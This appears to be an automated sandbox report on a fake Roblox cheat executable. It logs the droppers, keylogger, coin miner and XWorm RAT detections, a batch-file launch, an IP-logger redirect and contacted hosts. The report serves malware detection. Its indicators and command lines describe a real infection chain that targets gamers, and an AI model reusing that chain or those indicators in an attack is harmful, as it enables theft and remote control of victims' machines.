            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E8FCA0 FindFirstFileExA,0_2_00007FF693E8FCA0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E816A4 VirtualQuery,GetSystemInfo,0_2_00007FF693E816A4
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeThread delayed: delay time: 44981Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeThread delayed: delay time: 46239Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeThread delayed: delay time: 57753Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\coin.batJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\RobloxJump to behavior
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2129059301.0000000002899000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127732650.0000000002093000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.drBinary or memory string: MDALj2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmUv4RDsNuE
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3808182999.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3808215447.00000000028AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E83170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF693E83170
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_0125D0F8 mov eax, dword ptr fs:[00000030h]4_2_0125D0F8
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_0125D13C mov eax, dword ptr fs:[00000030h]4_2_0125D13C
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_012543AC mov ecx, dword ptr fs:[00000030h]4_2_012543AC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E90D20 GetProcessHeap,0_2_00007FF693E90D20
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E82510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF693E82510
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E83354 SetUnhandledExceptionFilter,0_2_00007FF693E83354
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E83170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF693E83170
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E876D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF693E876D8
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_01232F78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_01232F78
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_0123E378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0123E378
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E7B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E7B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E958E0 cpuid 0_2_00007FF693E958E0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF693E7A2CC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E80754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E80754
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E651A4 GetVersionExW,0_2_00007FF693E651A4
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cheat_roblox.exe PID: 3192, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cheat_roblox.exe PID: 3192, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts1
            Native API            		1
            Scripting            		1
            Exploitation for Privilege Escalation            		22
            Masquerading            		1
            Input Capture            		1
            System Time Discovery            		Remote Services1
            Input Capture            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		11
            Process Injection            		11
            Virtualization/Sandbox Evasion            		LSASS Memory221
            Security Software Discovery            		Remote Desktop Protocol12
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		11
            Process Injection            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS11
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Software Packing            		Cached Domain Credentials3
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSync126
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            File Deletion            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1484385 Sample: cheat_roblox.exe Startdate: 30/07/2024 Architecture: WINDOWS Score: 52 41 titanium.roblox.com 2->41 43 edge-term4.roblox.com 2->43 45 5 other IPs or domains 2->45 65 Malicious sample detected (through community Yara rule) 2->65 67 Antivirus detection for dropped file 2->67 69 Multi AV Scanner detection for dropped file 2->69 71 7 other signatures 2->71 9 cheat_roblox.exe 12 2->9         started        signatures3 process4 file5 33 C:\Users\user\...\RobloxPlayerInstaller.exe, PE32 9->33 dropped 35 C:\Users\user\AppData\Local\...\Keyloger.exe, PE32 9->35 dropped 37 C:\Users\user\AppData\...\BitCoin_miner.exe, PE32 9->37 dropped 39 C:\Users\user\AppData\Local\...\msedge.exe, PE32 9->39 dropped 12 cmd.exe 1 14 9->12         started        14 RobloxPlayerInstaller.exe 12 9->14         started        process6 dnsIp7 18 chrome.exe 22 12->18         started        22 cmd.exe 1 12->22         started        24 conhost.exe 12->24         started        59 edge-term4-ams2.roblox.com 128.116.21.3, 443, 49712 ROBLOX-PRODUCTIONUS United States 14->59 61 128.116.21.4, 443, 49715, 58804 ROBLOX-PRODUCTIONUS United States 14->61 63 2 other IPs or domains 14->63 73 Tries to detect virtualization through RDTSC time measurements 14->73 signatures8 process9 dnsIp10 47 192.168.2.6, 443, 49705, 49712 unknown unknown 18->47 49 192.168.2.7 unknown unknown 18->49 51 239.255.255.250 unknown Reserved 18->51 31 C:\Windows\...behaviorgraphoogle.Widevine.CDM.dll, PE32+ 18->31 dropped 26 chrome.exe 18->26         started        29 conhost.exe 22->29         started        file11 process12 dnsIp13 53 88.212.201.198, 443, 49745 UNITEDNETRU Russian Federation 26->53 55 counter.yadro.ru 88.212.201.204, 443, 49733, 49740 UNITEDNETRU Russian Federation 26->55 57 4 other IPs or domains 26->57

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            cheat_roblox.exe59%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            cheat_roblox.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\ msedge.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\Keyloger.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\ msedge.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Keyloger.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ msedge.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\Keyloger.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe0%ReversingLabs
            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\Google.Widevine.CDM.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://wieistmeineip.de0%URL Reputationsafe
            https://mercadoshops.com.co0%URL Reputationsafe
            https://gliadomain.com0%URL Reputationsafe
            https://poalim.xyz0%URL Reputationsafe
            https://mercadolivre.com0%URL Reputationsafe
            https://reshim.org0%URL Reputationsafe
            https://nourishingpursuits.com0%URL Reputationsafe
            https://medonet.pl0%URL Reputationsafe
            https://unotv.com0%URL Reputationsafe
            https://mercadoshops.com.br0%URL Reputationsafe
            https://zdrowietvn.pl0%URL Reputationsafe
            https://johndeere.com0%URL Reputationsafe
            https://songstats.com0%URL Reputationsafe
            https://baomoi.com0%URL Reputationsafe
            https://supereva.it0%URL Reputationsafe
            https://elfinancierocr.com0%URL Reputationsafe
            https://bolasport.com0%URL Reputationsafe
            https://rws1nvtvt.com0%URL Reputationsafe
            https://desimartini.com0%URL Reputationsafe
            https://hearty.app0%URL Reputationsafe
            https://hearty.gift0%URL Reputationsafe
            https://mercadoshops.com0%URL Reputationsafe
            https://heartymail.com0%URL Reputationsafe
            https://p106.net0%URL Reputationsafe
            https://radio2.be0%URL Reputationsafe
            https://finn.no0%URL Reputationsafe
            https://hc1.com0%URL Reputationsafe
            https://kompas.tv0%URL Reputationsafe
            https://mystudentdashboard.com0%URL Reputationsafe
            https://songshare.com0%URL Reputationsafe
            https://mercadopago.com.mx0%URL Reputationsafe
            https://p24.hu0%URL Reputationsafe
            https://talkdeskqaid.com0%URL Reputationsafe
            https://mercadopago.com.pe0%URL Reputationsafe
            https://cardsayings.net0%URL Reputationsafe
            https://text.com0%URL Reputationsafe
            https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
            https://mightytext.net0%URL Reputationsafe
            https://pudelek.pl0%URL Reputationsafe
            https://hazipatika.com0%URL Reputationsafe
            https://joyreactor.com0%URL Reputationsafe
            https://cookreactor.com0%URL Reputationsafe
            https://wildixin.com0%URL Reputationsafe
            https://eworkbookcloud.com0%URL Reputationsafe
            https://cognitiveai.ru0%URL Reputationsafe
            https://nacion.com0%URL Reputationsafe
            https://chennien.com0%URL Reputationsafe
            https://mercadopago.cl0%URL Reputationsafe
            https://talkdeskstgid.com0%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
            https://bonvivir.com0%URL Reputationsafe
            https://carcostadvisor.be0%URL Reputationsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt00%URL Reputationsafe
            https://salemovetravel.com0%URL Reputationsafe
            https://sapo.io0%URL Reputationsafe
            https://wpext.pl0%URL Reputationsafe
            https://welt.de0%URL Reputationsafe
            https://poalim.site0%URL Reputationsafe
            https://infoedgeindia.com0%URL Reputationsafe
            https://blackrockadvisorelite.it0%URL Reputationsafe
            https://cognitive-ai.ru0%URL Reputationsafe
            http://www.accv.es000%URL Reputationsafe
            https://cafemedia.com0%URL Reputationsafe
            https://thirdspace.org.au0%URL Reputationsafe
            https://mercadoshops.com.ar0%URL Reputationsafe
            https://smpn106jkt.sch.id0%URL Reputationsafe
            https://elpais.uy0%URL Reputationsafe
            https://landyrev.com0%URL Reputationsafe
            https://commentcamarche.com0%URL Reputationsafe
            https://tucarro.com.ve0%URL Reputationsafe
            https://rws3nvtvt.com0%URL Reputationsafe
            https://eleconomista.net0%URL Reputationsafe
            https://helpdesk.com0%URL Reputationsafe
            http://www.firmaprofesional.com/cps00%URL Reputationsafe
            https://clmbtech.com0%URL Reputationsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper0%Avira URL Cloudsafe
            http://tools.medialab.sciences-po.fr/iwanthue/index.php0%Avira URL Cloudsafe
            http://crl.dhimyotis.com/certignarootca.crl0%Avira URL Cloudsafe
            https://joyreactor.cc0%Avira URL Cloudsafe
            https://setup.rbxcdn.comwI&0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)p=0%Avira URL Cloudsafe
            https://nlc.hu0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPl0%Avira URL Cloudsafe
            https://client-telemetry.roblox.com0%Avira URL Cloudsafe
            http://www.roblox.com/om0%Avira URL Cloudsafe
            https://cdn.iplogger.org/redirect/logo-dark.png0%Avira URL Cloudsafe
            https://naukri.com0%Avira URL Cloudsafe
            https://smaker.pl0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.0%Avira URL Cloudsafe
            https://deccoria.pl0%Avira URL Cloudsafe
            https://24.hu0%Avira URL Cloudsafe
            https://iplogger.org/privacy/0%Avira URL Cloudsafe
            https://interia.pl0%Avira URL Cloudsafe
            http://www.cert.fnmt.es/dpcs/0%Avira URL Cloudsafe
            https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.070216341661487380%Avira URL Cloudsafe
            https://the42.ie0%Avira URL Cloudsafe
            http://www.winimage.com/zLibDll1.2.11rbr0%Avira URL Cloudsafe
            https://mercadolivre.com.br0%Avira URL Cloudsafe
            https://iplogger.org/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            counter.yadro.ru
            		88.212.201.204
            		truefalse
              		unknown
              a.nel.cloudflare.com
              		35.190.80.1
              		truefalse
                		unknown
                edge-term4-ams2.roblox.com
                		128.116.21.3
                		truefalse
                  		unknown
                  2no.co
                  		104.21.79.229
                  		truefalse
                    		unknown
                    cdn.iplogger.org
                    		172.67.132.113
                    		truefalse
                      		unknown
                      www.google.com
                      		142.250.186.100
                      		truefalse
                        		unknown
                        d2v57ias1m20gl.cloudfront.net
                        		13.32.110.82
                        		truefalse
                          		unknown
                          ecsv2.roblox.com
                          		unknown
                          		unknownfalse
                            		unknown
                            client-telemetry.roblox.com
                            		unknown
                            		unknownfalse
                              		unknown
                              clientsettingscdn.roblox.com
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://2no.co/24RXx6false
                                  		unknown
                                  https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738false
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://wieistmeineip.desets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://mercadoshops.com.cosets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://gliadomain.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://poalim.xyzsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://mercadolivre.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlRobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://reshim.orgsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperRobloxPlayerInstaller_2ACC2.log.4.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://nourishingpursuits.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://medonet.plsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)p=RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BBD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BBD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817957870.0000000004BBD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://unotv.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://mercadoshops.com.brsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://joyreactor.ccsets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://zdrowietvn.plsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://johndeere.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://setup.rbxcdn.comwI&RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://songstats.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://baomoi.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://supereva.itsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tools.medialab.sciences-po.fr/iwanthue/index.phpcheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://elfinancierocr.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://client-telemetry.roblox.comRobloxPlayerInstaller_2ACC2.log.4.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://bolasport.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://rws1nvtvt.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://desimartini.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://hearty.appsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://hearty.giftsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://mercadoshops.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://heartymail.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nlc.husets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://p106.netsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.roblox.com/omRobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://radio2.besets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.dhimyotis.com/certignarootca.crlRobloxPlayerInstaller.exe, 00000004.00000003.3805926753.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806474802.0000000004B6C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805832036.0000000004B57000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805686454.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806667375.0000000004B75000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3807165811.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817824110.0000000004B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://finn.nosets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://hc1.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://kompas.tvsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://mystudentdashboard.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://songshare.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://smaker.plsets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://iplogger.org/privacy/chromecache_145.11.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mercadopago.com.mxsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://p24.husets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://talkdeskqaid.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://24.husets.json.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mercadopago.com.pesets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://cardsayings.netsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://text.comsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://cdn.iplogger.org/redirect/logo-dark.pngchromecache_145.11.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://wwww.certigna.fr/autorites/0mRobloxPlayerInstaller.exe, 00000004.00000003.3805926753.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805686454.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817824110.0000000004B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://mightytext.netsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://pudelek.plsets.json.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
